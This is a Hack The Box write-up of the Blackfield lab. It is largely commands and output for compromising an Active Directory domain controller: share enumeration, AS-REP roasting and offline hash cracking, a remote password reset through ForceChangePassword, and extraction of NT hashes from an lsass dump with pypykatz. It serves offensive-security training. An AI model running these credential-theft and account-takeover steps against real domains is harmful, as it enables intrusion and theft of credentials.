> [!caution]
> **Pro-Tip**: Only look up the write-ups once you have genuinely tried everything and exhausted what you know. Whenever you do read one, make sure you learn something new: not "oh, I knew that, I should have tried it", but "that's new, great, that goes into my arsenal". Done consistently, this is what actually builds your skill set.
> IP address - 10.10.10.192
>> Full TCP port sweep with a high --min-rate to find the open ports quickly
**nmap -p- --min-rate 10000 -Pn -oA nmap-alltcp 10.10.10.192**
Service and version detection (-sV) against the host. Note that this second scan only covers nmap's default top-1000 ports, which is why WinRM on 5985 (used later in this write-up) is missing from the list below even though it is open; the -p- sweep above is the one that finds ports like that.
```sh
┌──(kali㉿kali)-[~/HTB]
└─$ nmap -sV -Pn 10.10.10.192
Starting Nmap 7.92 ( https://nmap.org ) at 2024-01-02 02:39 EST
Nmap scan report for 10.10.10.192
Host is up (0.20s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-02 15:40:13Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.53 seconds
```
### DNS - TCP/UDP 53
```sh
┌──(kali㉿kali)-[~/HTB]
└─$ dig @10.10.10.192 blackfield.local
; <<>> DiG 9.17.19-3-Debian <<>> @10.10.10.192 blackfield.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18455
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;blackfield.local. IN A
;; ANSWER SECTION:
blackfield.local. 600 IN A 10.10.10.192
;; Query time: 196 msec
;; SERVER: 10.10.10.192#53(10.10.10.192) (UDP)
;; WHEN: Tue Jan 02 02:48:55 EST 2024
;; MSG SIZE rcvd: 61
```
> An AXFR zone transfer would list every record in the zone (and so every hostname) if the server allowed it; domain controllers normally refuse transfers to arbitrary hosts.
### LDAP - TCP 389 / 3268
> First, let’s see if we can do an anonymous bind on the LDAP port using ldapsearch
```sh
┌──(kali㉿kali)-[~/HTB]
└─$ ldapsearch -x -b "dc=blackfield,dc=local" -H ldap://10.10.10.192
# extended LDIF
#
# LDAPv3
# base <dc=blackfield,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
```
> No luck: the 000004DC error means the DC rejects unauthenticated queries against the domain naming context, so anonymous LDAP gives us nothing beyond the rootDSE until we have credentials.
> Trying once more with the older -h host flag instead of -H, in case the URI form was the problem, gives the same answer:
```sh
┌──(kali㉿kali)-[~/tools/impacket-master/examples]
└─$ ldapsearch -h 10.10.10.192 -x -b "DC=BLACKFIELD,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=BLACKFIELD,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
```
> omoo, make i just try some possible wins, i no sabi which one go drop, but we keep bombing.... :zap:
> Checking for AS-REP roastable users (accounts with Kerberos pre-authentication disabled), first without a username list:
```sh
┌──(kali㉿kali)-[~/tools/impacket-master/examples]
└─$ python3 GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
```
> Without a user list, GetNPUsers first asks LDAP for the accounts, and that query needs a bind, so it fails for exactly the reason ldapsearch did. With -usersfile it talks straight to Kerberos on 88 and never touches LDAP, which is why it works further down once we have usernames.
> Testing for NULL access with **rpcclient** and **smbclient**: both let me connect, with different limits on what they return. The details are in the SMB section below. Hey, chill a bit, make I structure am so we fit understand when next we dey read am. No vex, my boss :bow:
### SMB - TCP 445
> Using crackmapexec, our go-to tool for checking which OS is running, since nmap only told us it was a Windows DC named DC01. Build 17763 is Windows Server 2019; signing is required, which rules out SMB relay to this host.
```sh
┌──(kali㉿kali)-[~/tools/impacket-master/examples]
└─$ crackmapexec smb 10.10.10.192
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
```
#### Null Connection
> With no creds, we check what we can find. Remember we tried this earlier when looking for quick wins; here is the detail.
> **RPCCLIENT**
```sh
┌──(kali㉿kali)-[~/tools/impacket-master/examples]
└─$ rpcclient 10.10.10.192 -U ""
Enter WORKGROUP\'s password:
rpcclient $> srvinfo
10.10.10.192 Wk Sv PDC Tim NT
platform_id : 500
os version : 10.0
server type : 0x80102b
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroup
command not found: enumdomgroup
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
```
> The null session is accepted (srvinfo works), but the SAMR queries that would give us users and groups are denied, so no user list this way. Next up: smbclient.
> For smbclient there are a few ways to perform a NULL connection:
```sh
┌──(kali㉿kali)-[~/HTB]
└─$ smbclient -L 10.10.10.192 -U ""
Enter WORKGROUP\'s password:
Sharename       Type    Comment
---------       ----    -------
ADMIN$          Disk    Remote Admin
C$              Disk    Default share
forensic        Disk    Forensic / Audit share.
IPC$            IPC     Remote IPC
NETLOGON        Disk    Logon server share
profiles$       Disk
SYSVOL          Disk    Logon server share
```
or, with -N to skip the password prompt entirely:
```sh
┌──(kali㉿kali)-[~/HTB]
└─$ smbclient -N -L \\\\10.10.10.192
Sharename       Type    Comment
---------       ----    -------
ADMIN$          Disk    Remote Admin
C$              Disk    Default share
forensic        Disk    Forensic / Audit share.
IPC$            IPC     Remote IPC
NETLOGON        Disk    Logon server share
profiles$       Disk
SYSVOL          Disk    Logon server share
Reconnecting with SMB1 for workgroup listing.
```
Using smbmap, which also shows the permissions per share (any non-existent username gives a guest session; `null` here is arbitrary):
```sh
┌──(kali㉿kali)-[~/HTB]
└─$ smbmap -H 10.10.10.192 -u null
[+] Guest session   IP: 10.10.10.192:445    Name: 10.10.10.192
        Disk            Permissions     Comment
        ----            -----------     -------
        ADMIN$          NO ACCESS       Remote Admin
        C$              NO ACCESS       Default share
        forensic        NO ACCESS       Forensic / Audit share.
        IPC$            READ ONLY       Remote IPC
        NETLOGON        NO ACCESS       Logon server share
        profiles$       READ ONLY
        SYSVOL          NO ACCESS       Logon server share
```
> From this we have READ access to profiles$ (and IPC$). A share of per-user profile folders is effectively a user list, so let's connect to it:
```sh
┌──(kali㉿kali)-[~/HTB]
└─$ smbclient -N //10.10.10.192/profiles$
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 12:47:12 2020
.. D 0 Wed Jun 3 12:47:12 2020
AAlleni D 0 Wed Jun 3 12:47:11 2020
ABarteski D 0 Wed Jun 3 12:47:11 2020
ABekesz D 0 Wed Jun 3 12:47:11 2020
ABenzies D 0 Wed Jun 3 12:47:11 2020
ABiemiller D 0 Wed Jun 3 12:47:11 2020
AChampken D 0 Wed Jun 3 12:47:11 2020
ACheretei D 0 Wed Jun 3 12:47:11 2020
ACsonaki D 0 Wed Jun 3 12:47:11 2020
AHigchens D 0 Wed Jun 3 12:47:11 2020
AJaquemai D 0 Wed Jun 3 12:47:11 2020
AKlado D 0 Wed Jun 3 12:47:11 2020
AKoffenburger D 0 Wed Jun 3 12:47:11 2020
AKollolli D 0 Wed Jun 3 12:47:11 2020
AKruppe D 0 Wed Jun 3 12:47:11 2020
AKubale D 0 Wed Jun 3 12:47:11 2020
ALamerz D 0 Wed Jun 3 12:47:11 2020
...[snip]...
```
> A lot of directories with nothing inside... are you kidding me; mad oo.. but wait oo, they look like usernames on the DC. Omo, make we create a list, life no suppose hard. A quick and dirty pipeline dumps the directory names to a file. You can use ChatGPT for this oo, no allow overthinking injure you :smile: I just learnt about it doing this lab though, so no worry.
```sh
# Keep only directory entries (type "D"), drop . and .., and print the name.
# The original grep -oE '[a-zA-Z0-9]{5,}' gets most of this listing right, but it
# would split names containing _ . or - (svc_backup -> "backup") and drop names
# shorter than five characters, so filter on the listing's columns instead.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ smbclient -N '\\10.10.10.192\profiles$' -c dir | awk '$2 == "D" && $1 != "." && $1 != ".." {print $1}' > blackfield.txt
```
> That worked. Alternatively, I found a blog describing how to mount the share on the local box (just hit enter when prompted for a password); you need to be root locally to mount it.
```sh
┌──(root💀kali)-[/home/kali/HTB/blackfield]
└─# mount -t cifs '//10.10.10.192/profiles$' /mnt
Password for root@//10.10.10.192/profiles$:
# (add -o guest,ro to skip the prompt and mount read-only)
```
> Under /mnt the share is now mounted and the (empty) per-user directories are visible, so the user wordlist is just a directory listing:
```sh
┌──(root💀kali)-[/home/kali/HTB/blackfield]
└─# ls -1 /mnt/ > users
```
> With our wordlist generated, the safe next step (no password guessing, so no lockouts) is an AS-REP roast, just like the Forest lab on HTB.
## Access as support
### AS-REP Roast -- using impacket-GetNPUsers
> As a reminder, **AS-REP roasting** is a technique that **retrieves crackable material for users** that have the **"Do not require Kerberos preauthentication"** property set: the KDC hands anyone who asks an AS-REP whose encrypted part is keyed with the user's password hash, and that blob can be cracked offline. One of the best tools for the job is **impacket-GetNPUsers**, which should already be installed on Kali.
> With the username list from the share we can test every account in one run:
```sh
# with the username wordlist we got from the shares, we can use that to perform the attack.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ impacket-GetNPUsers blackfield.local/ -usersfile blackfield.txt -dc-ip 10.10.10.192
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
...[snip]...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD.LOCAL:bd69446f63043a4930313aeba01d6255$3f6c2713f18b4a87e0d13a53f9dfac46b44e5cb8cfe489704ff34be2d1f7efa56afb1843830ace9a12a69f1380578045a407a6bccf7a22f40c4c1807a4f83bd74be4d09ba7aeddf3b327585bb383cbf8ef68ee58362813a526d89109fccc993ee0292b7723e74dbc879e1a2ea3da008866b408166676b6f0953b56c94d48d615b0b79c4f1385dd608ca4e9385360af97940d29d356441bf6c4836854c90a44854e2ef11558b20d2c899cb52bb188c7973df6cae91ac567bc2f5627ac0ad350997becbca8b0918d32ed0d3014a4e6ae1d742ccd8b4df5b3fac87aefd65eb8d07738b0f9d11f3f8f88c6c42859381ee8e8a355b4ce
```
> Nice, we have a hash for the support user. Two more things fall out of this output: KDC_ERR_C_PRINCIPAL_UNKNOWN means that name does not exist in the domain, while "doesn't have UF_DONT_REQUIRE_PREAUTH set" means the account exists but is not roastable, so the same run doubles as username validation (audit2020 is confirmed as a real account). If support's password is weak, we should be able to recover it.
### Crack Hash
> Now we just copy the recovered hash into a file and crack it offline against the rockyou list. Either john or hashcat works; john auto-detects the krb5asrep format (for hashcat it is mode 18200).
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)     <-- the password :XD
1g 0:00:02:34 DONE (2024-01-02 04:36) 0.006481g/s 92915p/s 92915c/s 92915C/s #13Carlyn..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
> Creds: support / **#00^BlackKnight**
### Access Check
> With these creds, let's see what kind of access we just acquired. Omo, support does not have WinRM access; I'm hungry now..
```sh
# checking for winrm
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'
WINRM 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\support:#00^BlackKnight
# [-] the login was rejected: the creds are fine (see below) but support lacks WinRM rights
# then smb, which works
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
```
> checking the file shares on smb using the creds found.
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
```
> Nothing exciting: compared with the guest session we gain READ on NETLOGON and SYSVOL, which every authenticated domain user gets, and still cannot touch forensic, ADMIN$ or C$.
> Checking the same with smbmap:
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'
[+] IP: 10.10.10.192:445 Name: 10.10.10.192
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
```
>The credentials are valid, but we still don’t have any remote shell on the machine. Let’s see if we can get some information about the domain using BloodHound.
## Access as audit2020
Enumeration failed me at first.
### SMB
I connected to each of the three readable shares:
* profiles$ -- all empty.
* NETLOGON -- empty.
* SYSVOL -- lmao, nothing useful in there either.
#### Kerberoasting -- using impacket-GetUserSPNs
Now that I have valid domain creds, I tried to Kerberoast. GetUserSPNs asks LDAP for user accounts with an SPN and requests a service ticket for each; "No entries found!" means there are no such accounts (computer accounts don't count), so no tickets came back :crying_cat_face: :crying_cat_face:
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ impacket-GetUserSPNs -request -dc-ip 10.10.10.192 'blackfield.local/support:#00^BlackKnight'
Impacket v0.11.0 - Copyright 2023 Fortra
No entries found!
```
### Active Directory Recon using Bloodhound
> Since we have a valid account now, we can use the BloodHound Python ingestor to collect the Active Directory data over LDAP. Install it with **python -m pip install bloodhound**.
The parameters for **bloodhound-python** took a bit of playing with:
* -c ALL - All collection methods
* -u support -p #00^BlackKnight - Username and password to auth as
* -d blackfield.local - domain name
* -dc dc01.blackfield.local - DC name (it won’t let you use an IP here)
* -ns 10.10.10.192 - use 10.10.10.192 as the DNS server
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (blackfield.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 01M 15S
# The Kerberos WARNING above is only because the attack box cannot resolve blackfield.local;
# an /etc/hosts entry for blackfield.local and dc01.blackfield.local -> 10.10.10.192 avoids
# it. The NTLM fallback still collected everything.
# or saving the JSON files as a single zip for upload into the GUI
$ bloodhound-python -c All -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 --zip
```
### Analysis
* sudo neo4j console (start the database first)
* sudo bloodhound (then the GUI, logging in with the neo4j credentials)
Once on the BloodHound dashboard, I uploaded the zip file into the UI.

> Once uploaded, we can use the pre-built queries under the Analysis tab to learn about the domain.

> The most notable query that deserves mention :rolling_on_the_floor_laughing: is **"Shortest Paths to High Value Targets"** *yesss, the oga boss, the king, the lion itself*, which dumped a lot of information.

> This shows us information about the svc_backup account, which we already enumerated (groups); however, nothing interesting for our current user 'support'.
> Checking the next query, "Find AS-REP Roastable Users", we see the 'support' account; clicking the node brings up its details.

> The Node Info tab reveals the rights and privileges our current user has.
>
> Under **Outbound Object Control > First Degree Object Control**, I found one particularly interesting edge: the 'support' account has ForceChangePassword over the audit2020 account, i.e. it can reset that user's password without knowing the current one.

> Right-clicking the edge and opening '? Help' shows an Abuse tab with a PowerView command for this. But we have no foothold on a Windows box, lmao, so we need to do it remotely from Linux.
### Changing the 'audit2020' Account's Password
#### Password Reset over RPC
> There's a well-known post by Mubix about resetting Windows passwords over RPC from Linux: https://room362.com/post/2017/reset-ad-user-password-with-linux/ (see also https://thehacker.recipes/ad/movement/dacl/forcechangespassword). I'll use rpcclient's setuserinfo2, where level 23 is the SAMR information class that carries a new password (UserInternal4Information):
* rpcclient 10.10.10.192 -U "support"
* setuserinfo2 audit2020 23 Password123
> A word of caution for real engagements: this is a reset, not a change, so the user's current password stops working and they will notice, and it leaves a 4724 (password reset attempt) event on the DC. Check the password policy first so the new value is accepted.
```s
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U "support"
Enter WORKGROUP\support's password:
rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 audit2020 23 Password123
rpcclient $> exit
```
> The reset printed nothing, which is how rpcclient signals success here. Still, it is worth pulling the domain password policy before choosing the new password so it is accepted: minimum length 7 with complexity enabled, which Password123 meets (upper, lower and digit make the three required character categories). Also note Lockout threshold: None, i.e. no account lockout at all, which matters if you were considering a password spray.
#### A quick one using enum4linux-ng
```sh
┌──(kali㉿kali)-[~/tools/enum4linux-ng]
└─$ python3 enum4linux-ng.py -u support -p '#00^BlackKnight' 10.10.10.192
=========================================
| Policies via RPC for 10.10.10.192 |
=========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: 41 days 23 hours 53 minutes
Password properties:
- DOMAIN_PASSWORD_COMPLEX: true
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
```
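The policy dump above is what decides whether a reset like `Password123` goes through, and whether spraying would have been safe. As an added example (not from the write-up or from enum4linux-ng), here is a small checker that parses those lines into a policy object and tests a candidate against the documented Windows complexity rule: at least three of five character classes, and no occurrence of the account name (or a display-name token of three or more characters). The sample text is constructed from the output above; the display-name handling follows Microsoft's documented passfilt behaviour and is not something the page shows.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed from the enum4linux-ng lines shown above (only the fields we need).
SAMPLE_POLICY_OUTPUT = """\
Domain password information:
    Password history length: 24
    Minimum password length: 7
    Maximum password age: 41 days 23 hours 53 minutes
    Password properties:
        - DOMAIN_PASSWORD_COMPLEX: true
Domain lockout information:
    Lockout observation window: 30 minutes
    Lockout duration: 30 minutes
    Lockout threshold: None
"""

@dataclass
class PasswordPolicy:
    min_length: int
    complexity: bool
    history_length: int
    lockout_threshold: Optional[int]    # None = accounts never lock out

def parse_policy(text: str) -> PasswordPolicy:
    """Pull the fields out of enum4linux-ng's 'Policies via RPC' block."""
    def grab(label: str, default: str) -> str:
        m = re.search(rf"^\s*(?:-\s*)?{re.escape(label)}:\s*(.+?)\s*$", text, re.M)
        return m.group(1) if m else default
    threshold = grab("Lockout threshold", "None")
    return PasswordPolicy(
        min_length=int(grab("Minimum password length", "0")),
        complexity=grab("DOMAIN_PASSWORD_COMPLEX", "false").lower() == "true",
        history_length=int(grab("Password history length", "0")),
        lockout_threshold=None if threshold.lower() == "none" else int(threshold),
    )

# The five character classes Windows counts; a complex password needs three of them.
_CLASSES = (
    lambda c: c.isupper(),
    lambda c: c.islower(),
    lambda c: c.isdigit(),
    lambda c: not c.isalnum(),                                   # symbols / punctuation
    lambda c: c.isalpha() and not (c.isupper() or c.islower()),  # letters without case
)

def check_password(password: str, policy: PasswordPolicy,
                   sam_account_name: str, display_name: str = "") -> List[str]:
    """Return the list of policy violations; an empty list means the DC will accept it."""
    problems = []
    if len(password) < policy.min_length:
        problems.append(f"shorter than {policy.min_length}")
    if policy.complexity:
        classes = sum(1 for test in _CLASSES if any(test(c) for c in password))
        if classes < 3:
            problems.append(f"only {classes} of 5 character classes (need 3)")
        lowered = password.lower()
        if len(sam_account_name) >= 3 and sam_account_name.lower() in lowered:
            problems.append("contains the account name")
        for token in re.split(r"[,.\-_ #\t]+", display_name):
            if len(token) >= 3 and token.lower() in lowered:
                problems.append(f"contains display-name token {token!r}")
    return problems

def spray_is_safe(policy: PasswordPolicy, attempts: int) -> bool:
    """True if `attempts` guesses per account cannot lock anyone out under this policy."""
    return policy.lockout_threshold is None or attempts < policy.lockout_threshold

if __name__ == "__main__":
    policy = parse_policy(SAMPLE_POLICY_OUTPUT)
    for candidate in ("Password123", "password123", "Pass1", "Audit2020!x"):
        print(candidate, check_password(candidate, policy, "audit2020") or "OK")
    print("spray 5/account safe:", spray_is_safe(policy, 5))
```

The same `check_password` is worth running before any `setuserinfo2`: a rejected reset over SAMR is a wasted, logged attempt, whereas the policy itself can be read by any domain user.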
> Now that the password for 'audit2020' has been changed, we need to test our access as that user.
> Using crackmapexec to confirm the reset took:
### Check Creds
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p Password123
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123
# This proves that the credentials worked
# failed with winrm
```
### Priv Escalation : audit2020 >> svc_backup
> Enumerating the shares with the 'audit2020' account:
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ smbmap -H 10.10.10.192 -u audit2020 -p Password123
[+] IP: 10.10.10.192:445 Name: 10.10.10.192
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
# we get READ permission on the forensic share
```
> Connecting to forensic, there are three folders:
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ smbclient -U audit2020 //10.10.10.192/forensic Password123
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
5102079 blocks of size 4096. 1672162 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
\commands_output
. D 0 Sun Feb 23 13:14:37 2020
.. D 0 Sun Feb 23 13:14:37 2020
domain_admins.txt A 528 Sun Feb 23 08:00:19 2020
domain_groups.txt A 962 Sun Feb 23 07:51:52 2020
domain_users.txt A 16454 Fri Feb 28 17:32:17 2020
firewall_rules.txt A 518202 Sun Feb 23 07:53:58 2020
ipconfig.txt A 1782 Sun Feb 23 07:50:28 2020
netstat.txt A 3842 Sun Feb 23 07:51:01 2020
route.txt A 3976 Sun Feb 23 07:53:01 2020
systeminfo.txt A 4550 Sun Feb 23 07:56:59 2020
tasklist.txt A 9990 Sun Feb 23 07:54:29 2020
\memory_analysis
. D 0 Thu May 28 16:28:33 2020
.. D 0 Thu May 28 16:28:33 2020
conhost.zip A 37876530 Thu May 28 16:25:36 2020
ctfmon.zip A 24962333 Thu May 28 16:25:45 2020
dfsrs.zip A 23993305 Thu May 28 16:25:54 2020
dllhost.zip A 18366396 Thu May 28 16:26:04 2020
ismserv.zip A 8810157 Thu May 28 16:26:13 2020
lsass.zip A 41936098 Thu May 28 16:25:08 2020
mmc.zip A 64288607 Thu May 28 16:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 16:26:24 2020
ServerManager.zip A 131983313 Thu May 28 16:26:49 2020
sihost.zip A 33141744 Thu May 28 16:27:00 2020
smartscreen.zip A 33756344 Thu May 28 16:27:11 2020
svchost.zip A 14408833 Thu May 28 16:27:19 2020
taskhostw.zip A 34631412 Thu May 28 16:27:30 2020
winlogon.zip A 14255089 Thu May 28 16:27:38 2020
wlms.zip A 4067425 Thu May 28 16:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 16:27:53 2020
...[snip]...
```
> The file that stands out after enumeration is lsass.zip under memory_analysis: a memory dump of the LSA process on the DC, which is exactly what mimikatz-style tools read credentials from.
### LSASS Dump
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ file lsass.DMP
lsass.DMP: Mini DuMP crash report, 16 streams, Sun Feb 23 18:02:01 2020, 0x421826 type
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls -lh lsass.DMP
-rwxrwx--- 1 root vboxsf 137M Feb 23 11:02 lsass.DMP
```
> Using pypykatz https://github.com/skelsec/pypykatz, a mimikatz implementation in Python, we can try to read the content of lsass.DMP and maybe grab some passwords or hashes.
> I’ll install it with **pip3 install pypykatz**. https://en.hackndo.com/remote-lsass-dump-passwords/#linux--windows has a good section on dumping with pypykatz from Linux. It dumps a bunch of information:
```sh
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pypykatz lsa minidump lsass.DMP
INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
== SSP [633ba]==
username
domainname
password None
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
Password: None
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
== LogonSession ==
authentication_id 365835 (5950b)
session_id 2
username UMFD-2
domainname Font Driver Host
logon_server
logon_time 2020-02-23T17:59:38.218491+00:00
